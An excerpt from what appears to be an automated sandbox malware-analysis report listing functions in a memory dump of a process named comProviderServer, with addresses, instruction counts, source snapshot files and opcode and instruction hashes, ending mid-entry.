              • Opcode ID: 11f0ed3c9f7411b9b8b4ec9afbbef1e0b6a247f153f2e6976299342649d43a43
              • Instruction ID: d947a348f6ff6d33f8cc38c0faee95aa47fc1e9aa1ff653818dc1a46514d55a9
              • Opcode Fuzzy Hash: 11f0ed3c9f7411b9b8b4ec9afbbef1e0b6a247f153f2e6976299342649d43a43
              • Instruction Fuzzy Hash: 0261D330A19F4A8FEB48DF1898549BAB7E2FF99310B14857EE44EC7291CE34E80587D1
              Function 00007FFAAC3F33DC Relevance: .2, Instructions: 224COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000007.00000002.1425321220.00007FFAAC3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_7_2_7ffaac3f0000_comProviderServer.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: e6cd6e7caf326e9d72a385450e247b14329ca5d9c067e6a17589b09fedc6f143
              • Instruction ID: cdd16dd238475961104805869ebec663c93da8c355e1ab2c4f6c80c8d7240897
              • Opcode Fuzzy Hash: e6cd6e7caf326e9d72a385450e247b14329ca5d9c067e6a17589b09fedc6f143
              • Instruction Fuzzy Hash: FF718670909B898FEB8ADB78C459AB97BE0FF56300F0448FAD40DCB192DA39E545C791
              Function 00007FFAAC3FAEE0 Relevance: .2, Instructions: 223COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000007.00000002.1425321220.00007FFAAC3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_7_2_7ffaac3f0000_comProviderServer.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 68662f1911b4529d667d0b0653e44e329b1018b6b05ebb096f5a0f970d6d1f4c
              • Instruction ID: c7e1883804b17dae34f23b2047698975d9cb1ca3abc9716b2bff58dcd0977206
              • Opcode Fuzzy Hash: 68662f1911b4529d667d0b0653e44e329b1018b6b05ebb096f5a0f970d6d1f4c
              • Instruction Fuzzy Hash: DD71A070919B4E8FEB55EF28C4599BE7BE0FF19301F0089BAD419CA1A2DB34E554C790
              Function 00007FFAAC3F27CD Relevance: .2, Instructions: 209COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000007.00000002.1425321220.00007FFAAC3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_7_2_7ffaac3f0000_comProviderServer.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: d5ff8f3c715ecd0f12fc71c0c1305be6aefb25aee7d3b5511eac5206d5f6b216
              • Instruction ID: 064285d81801805d0a9e926245faa937d82c63097e38aded267ec3001c99e9e4
              • Opcode Fuzzy Hash: d5ff8f3c715ecd0f12fc71c0c1305be6aefb25aee7d3b5511eac5206d5f6b216
              • Instruction Fuzzy Hash: 2B511D3660A7568BE302BB78E455DE97760EF82325B08C977D08DCD0A3DE28944987E1
              Function 00007FFAAC3F3078 Relevance: .2, Instructions: 197COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000007.00000002.1425321220.00007FFAAC3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_7_2_7ffaac3f0000_comProviderServer.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 8d3f883bba95b66e79a956f83e153e089c3ad3e3f9eed7e773b36215a1fefda5
              • Instruction ID: ac7bd2779e54d9c5cd15e9015981ea4b573aa2c40581f21c2aad7f109858d221
              • Opcode Fuzzy Hash: 8d3f883bba95b66e79a956f83e153e089c3ad3e3f9eed7e773b36215a1fefda5
              • Instruction Fuzzy Hash: 8361A67081EF8A8FF7959B788855AE97BF0EF06300F0489F6D449CB192DA28D548C7E1
              Function 00007FFAAC3FAF2D Relevance: .2, Instructions: 187COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000007.00000002.1425321220.00007FFAAC3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_7_2_7ffaac3f0000_comProviderServer.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 933dbcb5ccc9a4857991f02b0914a1329f26445897bbc40ce989f7310d4c099a
              • Instruction ID: 5975797c5a192461b4b1afff272c344f43e32363d6ceee6a0c37625a17974db1
              • Opcode Fuzzy Hash: 933dbcb5ccc9a4857991f02b0914a1329f26445897bbc40ce989f7310d4c099a
              • Instruction Fuzzy Hash: 53615B3095A78ACFEB959F2488196BA7BB0FF16304F0045BAD809C7192DB78A558C781
              Function 00007FFAAC3FCAB0 Relevance: .2, Instructions: 181COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000007.00000002.1425321220.00007FFAAC3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_7_2_7ffaac3f0000_comProviderServer.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 4d64e9ec7f03cf99e3768a61442bfdd5112b660978bb57839bc8447dd4bd17e5
              • Instruction ID: 674f05fc86226b1bae1f3b97af54a417a785135a04411a9d5a25b1c8ef8ebc98
              • Opcode Fuzzy Hash: 4d64e9ec7f03cf99e3768a61442bfdd5112b660978bb57839bc8447dd4bd17e5
              • Instruction Fuzzy Hash: 85517030919E4ECFEB55EF64C458AFEB7E0EF1A301F10497AD40DDA192DA38A548C790
              Function 00007FFAAC3F2A10 Relevance: .2, Instructions: 178COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000007.00000002.1425321220.00007FFAAC3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_7_2_7ffaac3f0000_comProviderServer.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: ad7dddd9c5ef012731c18ef6ae5d3d68fa8d1110d8dc035ad77f41795e08d5fc
              • Instruction ID: 11e42034fb0ef0856c3c7d314706fa107738d72e9e066cc08c6b5e8593546bb5
              • Opcode Fuzzy Hash: ad7dddd9c5ef012731c18ef6ae5d3d68fa8d1110d8dc035ad77f41795e08d5fc
              • Instruction Fuzzy Hash: 95514E70919F4DCEF795EB68C449AB9BBE0EF4A300F4089B6D40DDB192DA38E54887D1
              Function 00007FFAAC3FB0B8 Relevance: .2, Instructions: 171COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000007.00000002.1425321220.00007FFAAC3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_7_2_7ffaac3f0000_comProviderServer.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 5aa8c094684c69f8387d42c2cc2ddf7aed7360c05f82a45e8779cc0a2a53c836
              • Instruction ID: 1d57cf2e3fc369ee51f08445a4d3b124b81ba93875929bb023fbad289ea4ff64
              • Opcode Fuzzy Hash: 5aa8c094684c69f8387d42c2cc2ddf7aed7360c05f82a45e8779cc0a2a53c836
              • Instruction Fuzzy Hash: AF518F30949B4E8FEB55EB64D415AFABBF0FF16300F0049BAD419DB192DA39A548C790
              Function 00007FFAAC3F1D29 Relevance: .2, Instructions: 167COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000007.00000002.1425321220.00007FFAAC3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_7_2_7ffaac3f0000_comProviderServer.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: c74286f758c66cdcbbef65000a96c597efe88375f3ffc376730ddb74472c3752
              • Instruction ID: 2551b8e89655e5d0975f80058f221cec57fc5f796769920fc008f1f6aa7d883b
              • Opcode Fuzzy Hash: c74286f758c66cdcbbef65000a96c597efe88375f3ffc376730ddb74472c3752
              • Instruction Fuzzy Hash: DB418131A18F498BDB4CDF1898559BAB3E2FBD8315B10453EE55EC7295CE30E80287C1
              Function 00007FFAAC3FB092 Relevance: .2, Instructions: 161COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000007.00000002.1425321220.00007FFAAC3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_7_2_7ffaac3f0000_comProviderServer.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: aedf1b9595b607c9541928d5cd6abaa57ef8e89680497a268dc472e3a2609e62
              • Instruction ID: 1470aeaed76fd9acbd8cacc31ba7868c020e8dd657dc0266515421a57c0c0149
              • Opcode Fuzzy Hash: aedf1b9595b607c9541928d5cd6abaa57ef8e89680497a268dc472e3a2609e62
              • Instruction Fuzzy Hash: 2E516E34909B8E8FEB55DF28C859AFA7BB0FF16300F0445BBD409CB192DA34A558CB91
              Function 00007FFAAC3FCAC8 Relevance: .2, Instructions: 158COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000007.00000002.1425321220.00007FFAAC3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_7_2_7ffaac3f0000_comProviderServer.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 314ba321a7616df35d075f6cf0bf5e2bb2aa0489cd685da0a04ce0ebc4eb81b6
              • Instruction ID: 6d1cfd900f9bf8d7daa6ac3698f289ae8c10392269679477c605f340e1268448
              • Opcode Fuzzy Hash: 314ba321a7616df35d075f6cf0bf5e2bb2aa0489cd685da0a04ce0ebc4eb81b6
              • Instruction Fuzzy Hash: B651DA75E4EB568FF712AB78A4159FD7BB0EF02324F048577D40DCA193D928A84883E1
              Function 00007FFAAC3F120D Relevance: .2, Instructions: 156COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000007.00000002.1425321220.00007FFAAC3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_7_2_7ffaac3f0000_comProviderServer.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 3c2c4f5f93508f07c619cbf9be63dbd401a60a276e719eb9816732198c9dfb19
              • Instruction ID: 47352dc91e68b74ef9896fe0275f1e62acb05ee1dbeebdd16ec252598940f130
              • Opcode Fuzzy Hash: 3c2c4f5f93508f07c619cbf9be63dbd401a60a276e719eb9816732198c9dfb19
              • Instruction Fuzzy Hash: 2D51F570909E4D8FEB48EB68D455AF9BBF0FF5A311F0408BAD00EDB192CA25A844C7D0
              Function 00007FFAAC3F2DE9 Relevance: .2, Instructions: 150COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000007.00000002.1425321220.00007FFAAC3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_7_2_7ffaac3f0000_comProviderServer.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 64c5e96f151a5a1518e7f2f589c96db7e0f19267711156f3b198383acf553fdb
              • Instruction ID: 4149b79f248fb913da912dce150efc06ed5d7a088fdbd88440f4f2dc15c7ff4a
              • Opcode Fuzzy Hash: 64c5e96f151a5a1518e7f2f589c96db7e0f19267711156f3b198383acf553fdb
              • Instruction Fuzzy Hash: E941963085EF8ACFF7559B748814AFABBA0FF16310F0489B6D409CA0D2DA29E558C7D1
              Function 00007FFAAC422CF0 Relevance: .1, Instructions: 146COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000007.00000002.1425321220.00007FFAAC3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_7_2_7ffaac3f0000_comProviderServer.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: bbcd1046bfdfd96c6e67417519de86830282fc5367a628882d69fe5bb515ee76
              • Instruction ID: c158cd9f49dc5f3620cdbe6677214699a804b565b7871f6cd06141e9803db09a
              • Opcode Fuzzy Hash: bbcd1046bfdfd96c6e67417519de86830282fc5367a628882d69fe5bb515ee76
              • Instruction Fuzzy Hash: 89515B74D1961ACFEB60EB68C4496EDB7F0FF09314F008976D00DD7196EA38E5488B94
              Function 00007FFAAC3FB0B5 Relevance: .1, Instructions: 145COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000007.00000002.1425321220.00007FFAAC3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_7_2_7ffaac3f0000_comProviderServer.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 3d700302ada8f97853328d36dc0d95c8bc81349440af2f9e10fd88f8d8388c22
              • Instruction ID: 322b73a78fb7d8e3cb6316dfed79b57f6b1cc7b13f2c7bc77d44fe23750b73fd
              • Opcode Fuzzy Hash: 3d700302ada8f97853328d36dc0d95c8bc81349440af2f9e10fd88f8d8388c22
              • Instruction Fuzzy Hash: 17518F30949B4E8FEB65DB649815AFEBBB0FF06310F0449BBD419CA192DB389548C7D1
              Function 00007FFAAC3F29F8 Relevance: .1, Instructions: 138COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000007.00000002.1425321220.00007FFAAC3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_7_2_7ffaac3f0000_comProviderServer.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 5351b878143a8c7570a2b05b9bc65246016dc9773df7fdc3782abdf681fc7439
              • Instruction ID: d253638ee9d0d24f1f7c9d61701358855a29151a4a8ae1aee4d82ca99e7a5328
              • Opcode Fuzzy Hash: 5351b878143a8c7570a2b05b9bc65246016dc9773df7fdc3782abdf681fc7439
              • Instruction Fuzzy Hash: E541C67091EB4ACBF795EB78C415AF97BE0EF06304F0489B6D40DCA192DA28E548C7D1
              Function 00007FFAAC3F3190 Relevance: .1, Instructions: 135COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000007.00000002.1425321220.00007FFAAC3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_7_2_7ffaac3f0000_comProviderServer.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 2373b147e4988a2cedbf4759206426f769be01269ca7050178d02c1d057c194a
              • Instruction ID: bd46b28f60b3808472bb9d8c33f453b405cd50e7ddfe0ce028968c806264afd0
              • Opcode Fuzzy Hash: 2373b147e4988a2cedbf4759206426f769be01269ca7050178d02c1d057c194a
              • Instruction Fuzzy Hash: 25416D70919E4DCFEB94EB68C854AEDB7F0EF05300F4084B6D00DDB291DA78A948CB91
              Function 00007FFAAC3FA8F8 Relevance: .1, Instructions: 123COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000007.00000002.1425321220.00007FFAAC3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_7_2_7ffaac3f0000_comProviderServer.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 75040165e7d4476cb166ef6ece1b742e9bab56ed72c57bf37c6f0195ecfd7e99
              • Instruction ID: b6fbeb1c6c0a2b1d7bb19a2d76e0b709aae7368a3965b9302d7b2c58cff41698
              • Opcode Fuzzy Hash: 75040165e7d4476cb166ef6ece1b742e9bab56ed72c57bf37c6f0195ecfd7e99
              • Instruction Fuzzy Hash: F341D33185EF8D8FFB45AB648815AF9BBE0EF06300F058976D40DD6192DE28A5188791
              Function 00007FFAAC3F1220 Relevance: .1, Instructions: 120COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000007.00000002.1425321220.00007FFAAC3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_7_2_7ffaac3f0000_comProviderServer.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: d0f01b4b697ae9a55a1ccdaeb597026cd3e729b6cc28058045aef9b7e9fe7833
              • Instruction ID: 27e05c020d7f9abf0f4d7b1a60de3f9a3baee45e477b3d8d8fb7a4836754251a
              • Opcode Fuzzy Hash: d0f01b4b697ae9a55a1ccdaeb597026cd3e729b6cc28058045aef9b7e9fe7833
              • Instruction Fuzzy Hash: 5F31A371909E4E8FFB94DBA8D414AF9BBB0FF56310F0448BAD10DD7192DA64A80887D0
              Function 00007FFAAC3FB220 Relevance: .1, Instructions: 117COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000007.00000002.1425321220.00007FFAAC3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_7_2_7ffaac3f0000_comProviderServer.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 9a4f34ac2532a493105c0229bbe42a2e9860d5c22625a4112f866c924b437c4e
              • Instruction ID: ea06ad4c12a777041134ff24f0e4b754e29ac6f74ebd6d8107e0fb353c8f4fc1
              • Opcode Fuzzy Hash: 9a4f34ac2532a493105c0229bbe42a2e9860d5c22625a4112f866c924b437c4e
              • Instruction Fuzzy Hash: 0531A57085EB4ACFE745AB3488595FEBBA0FF06304F0589BAD40DCA092DA28E558C791
              Function 00007FFAAC3FCCB8 Relevance: .1, Instructions: 111COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000007.00000002.1425321220.00007FFAAC3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_7_2_7ffaac3f0000_comProviderServer.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 8fde8aaf4dda8a05fc24bf233c8d51613b2fe96331444ca78936f7f8680cb6be
              • Instruction ID: 33c366e57a9fd8c7903ef0c47cc5d48785d6897f352b27a61800980da1ce7f1e
              • Opcode Fuzzy Hash: 8fde8aaf4dda8a05fc24bf233c8d51613b2fe96331444ca78936f7f8680cb6be
              • Instruction Fuzzy Hash: C3410A70C19F4ACEEB549F64D418AFDB7A0EF06310F50897AD40DDE295DA78A948CBE0
              Function 00007FFAAC3F266D Relevance: .1, Instructions: 110COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000007.00000002.1425321220.00007FFAAC3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_7_2_7ffaac3f0000_comProviderServer.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 1d4e9ef089315aaa78793a8a4b83fc6cad4e5ac67fb4480515d444cec97e75b2
              • Instruction ID: 8e5c7449c30e71ef6ef238f72b265be0e4602e32c8c730d6fa599fe397b480fe
              • Opcode Fuzzy Hash: 1d4e9ef089315aaa78793a8a4b83fc6cad4e5ac67fb4480515d444cec97e75b2
              • Instruction Fuzzy Hash: DF31963081EBCACFEB569B3488545A97FB0FF06200F0589FAE448CA193DA69D558C791
              Function 00007FFAAC3F0500 Relevance: .1, Instructions: 109COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000007.00000002.1425321220.00007FFAAC3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_7_2_7ffaac3f0000_comProviderServer.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: a5752e222c305d53468f0b80a03b21fbedc2b6a2a691179984814b3db98ed627
              • Instruction ID: ce3f003e519e1e42b5d05efb1f5158fd838906011297840f15f7433b3d5758c7
              • Opcode Fuzzy Hash: a5752e222c305d53468f0b80a03b21fbedc2b6a2a691179984814b3db98ed627
              • Instruction Fuzzy Hash: E541663081DB8DCFEB55DB3488589A97BE0FF16300F4489BAE40DCA192DA39E558C791
              Function 00007FFAAC3F2E78 Relevance: .1, Instructions: 102COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000007.00000002.1425321220.00007FFAAC3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_7_2_7ffaac3f0000_comProviderServer.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: a60036ef2dc0f164b7fb75a12c319ffafd6c9fe6e74b499359a5b7066f727978
              • Instruction ID: b6ef979d91eaf900e0832f097f672a86cbe2568acaffecd05b225645422a059e
              • Opcode Fuzzy Hash: a60036ef2dc0f164b7fb75a12c319ffafd6c9fe6e74b499359a5b7066f727978
              • Instruction Fuzzy Hash: FA31B63095EF8ACFF75197248815AFABBA0EF16310F04C976D40CC91D2EA69D55887D1
              Function 00007FFAAC3F3188 Relevance: .1, Instructions: 98COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000007.00000002.1425321220.00007FFAAC3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_7_2_7ffaac3f0000_comProviderServer.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: e0460ce3919305e37f395a090a7f7290475842dd7e369fb2aca2ac3138bf6153
              • Instruction ID: 044e616d2a4683b0c01a18209433219162ca132b3dcb91c0a63e26061e2c6800
              • Opcode Fuzzy Hash: e0460ce3919305e37f395a090a7f7290475842dd7e369fb2aca2ac3138bf6153
              • Instruction Fuzzy Hash: 6131B37091AF49CEF798DB68C455AFDBBE0EF06300F4088B9D409D6192DA28D548C7D1
              Function 00007FFAAC3FA968 Relevance: .1, Instructions: 89COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000007.00000002.1425321220.00007FFAAC3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_7_2_7ffaac3f0000_comProviderServer.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 4c721b25e35dfe876703d623b1380b0a4f17c267d09e96d23dc04de973653e7c
              • Instruction ID: dcfab98adcb849c803725190d4302c1e4a735b548ae6c1d9e48fcdef72a0b476
              • Opcode Fuzzy Hash: 4c721b25e35dfe876703d623b1380b0a4f17c267d09e96d23dc04de973653e7c
              • Instruction Fuzzy Hash: 0321C531D5EF4DCBFB45AB64C825AFDB7A0FF0A300F058976E40DD6192DE28A51887A1
              Function 00007FFAAC3F32B1 Relevance: .1, Instructions: 79COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000007.00000002.1425321220.00007FFAAC3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_7_2_7ffaac3f0000_comProviderServer.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 72da69de298d46154379751ae528ffdf7e9d9d003d61c2eff1c1c05880884979
              • Instruction ID: 9c876dd631b71e7f1707d3885cb942ec04d749fcbc4114256ebefb6ea84fc961
              • Opcode Fuzzy Hash: 72da69de298d46154379751ae528ffdf7e9d9d003d61c2eff1c1c05880884979
              • Instruction Fuzzy Hash: 6021D871D09A1DCFEB98EB98C454AECB7F1FB59300F50856AD00DEB295CE78A944CB90
              Function 00007FFAAC3F04F8 Relevance: .1, Instructions: 76COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000007.00000002.1425321220.00007FFAAC3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_7_2_7ffaac3f0000_comProviderServer.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: f3f049f8fd0732abbf3a39511491374513f556a1ef435a35c6c078ce01953703
              • Instruction ID: 7f56e628aff72892fe5d6625b720692287a1915f16c1380ee42a13d17f97d4cc
              • Opcode Fuzzy Hash: f3f049f8fd0732abbf3a39511491374513f556a1ef435a35c6c078ce01953703
              • Instruction Fuzzy Hash: D3216530919B4DCFEB55EF34C858AB97BA0FF16300F0489BAE40DCA1A6DA35E558C791
              Function 00007FFAAC3FCC88 Relevance: .1, Instructions: 75COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000007.00000002.1425321220.00007FFAAC3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_7_2_7ffaac3f0000_comProviderServer.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 67b9d4589a94cac047865dbfb046d50d993249b5647e24fe92ebd3c15bd7d898
              • Instruction ID: d5298a5d4aeb36300cc7b5ca4ded7037bcec240364758a75311c0b74d7a3d802
              • Opcode Fuzzy Hash: 67b9d4589a94cac047865dbfb046d50d993249b5647e24fe92ebd3c15bd7d898
              • Instruction Fuzzy Hash: BF21B03491D65ACFFB61AB64C8196F977F0FF06328F048A76D40DD2191EE78A1488B84
              Function 00007FFAAC3F0A01 Relevance: .1, Instructions: 69COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000007.00000002.1425321220.00007FFAAC3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_7_2_7ffaac3f0000_comProviderServer.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 776d58939e6a5d0246a7890be0168f17c8651cd5ff70a7f35b8548a097fc033f
              • Instruction ID: 770a9bd3d380b9b5466439acc7016e9b2548ade4c0aa6a17a561860ea541a2dc
              • Opcode Fuzzy Hash: 776d58939e6a5d0246a7890be0168f17c8651cd5ff70a7f35b8548a097fc033f
              • Instruction Fuzzy Hash: 5A118474919E0E8FEB40EB68C4499BD7BE0FF55300F4089B6D01DCA0A6DE34E9488790
              Function 00007FFAAC3F2EE8 Relevance: .1, Instructions: 66COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000007.00000002.1425321220.00007FFAAC3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_7_2_7ffaac3f0000_comProviderServer.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: b8498b86d74f4777c1035e62b129b1ba89cd162835dc4a5a6ea969a6f0010605
              • Instruction ID: 15a55858dd22ce0a8a88137d8ee86b3c14d853ab7d555a496b2c2b3d9405d5af
              • Opcode Fuzzy Hash: b8498b86d74f4777c1035e62b129b1ba89cd162835dc4a5a6ea969a6f0010605
              • Instruction Fuzzy Hash: E221C33196EF8ACBF71197208818AFAB7A0FF16311F04C976D809CA1D1EA39E55886D1
              Function 00007FFAAC3F26F9 Relevance: .1, Instructions: 63COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000007.00000002.1425321220.00007FFAAC3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_7_2_7ffaac3f0000_comProviderServer.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: c37d4825d4e48e831e62f9a953227d392a9c03e33c2d2521b0ff59d8dd7d166a
              • Instruction ID: a559a762b8f228bfc8c6f5c525322ccb27cffe7d1213de5a177cc2a12261a4c4
              • Opcode Fuzzy Hash: c37d4825d4e48e831e62f9a953227d392a9c03e33c2d2521b0ff59d8dd7d166a
              • Instruction Fuzzy Hash: F611663181EB89CFEB599F2488546B97BA0FF16300F0489BAE409CA192DA39E55CC791
              Function 00007FFAAC3F31F8 Relevance: .1, Instructions: 61COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000007.00000002.1425321220.00007FFAAC3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_7_2_7ffaac3f0000_comProviderServer.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: b843f7557fddf5e38e6490f77f478c23459182f10edbea236f63c37a8448bb9f
              • Instruction ID: 2f5d88ea020b53c32aa46db8de6c6b860be8d115f5592d692afc644204e72f92
              • Opcode Fuzzy Hash: b843f7557fddf5e38e6490f77f478c23459182f10edbea236f63c37a8448bb9f
